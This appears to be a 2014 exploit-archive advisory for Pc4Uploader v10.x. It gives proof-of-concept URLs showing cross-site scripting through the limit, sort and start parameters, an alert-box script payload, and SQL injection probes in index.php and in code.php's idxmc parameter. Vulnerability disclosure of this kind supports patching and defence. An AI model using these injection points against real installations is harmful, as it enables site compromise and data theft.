facebook facebook twitter rss

Pc4Uploader v10.x - Cross Site Scripting - SQL injection

Author: Dr.web , Published: 24-10-2014
***************************************************
# Title: Pc4Uploader v10.x - Cross Site Scripting - SQL injection
# Author: Dr.web
# Vendor Homepage: http://pc4arb.com
# Contact: u8p@hotmail.com ; skype: dr.web559
# Greets To: Brg alshmail - a!7rBi - x_man_3r3r - Hannibal Ksa - QaTaR-Attack - mr.hx - XP - r3m0t3Nu11 - xdr.devilx - lov3rdns - xSecurity
***************************************************
a) Cross Site Scripting
parameters Infected xss (limit - sort - start )
#exp : http://localhost/up4/index.php?limit=here put coding xss&mod=search&sort=1&start=20&word=1
#exp2: http://localhost/up4/index.php?limit=1&mod=search&sort=here put coding xss&start=20&word=1
#exp3 : http://localhost/up4/index.php?limit=1&mod=search&sort=1&start=here put coding xss&word=1
#exp coding xss : ’><script>alert(1)</script>
b) SQL injection
parameters Infected sqli (limit - sort - start )
#exp : http://localhost/up4/index.php?limit=1%27&mod=search&sort=idx&start=20&word=1

c) SQL injection
code.php -> sqli :D
parameters Infected sqli ( idxmc )
#exp : http://localhost/up4/code.php?d=1&f=load&idxmc=1%27&sb=250

Claimed comes when you download the file and upload it open to show you the words of Infected

Like us on Facebook :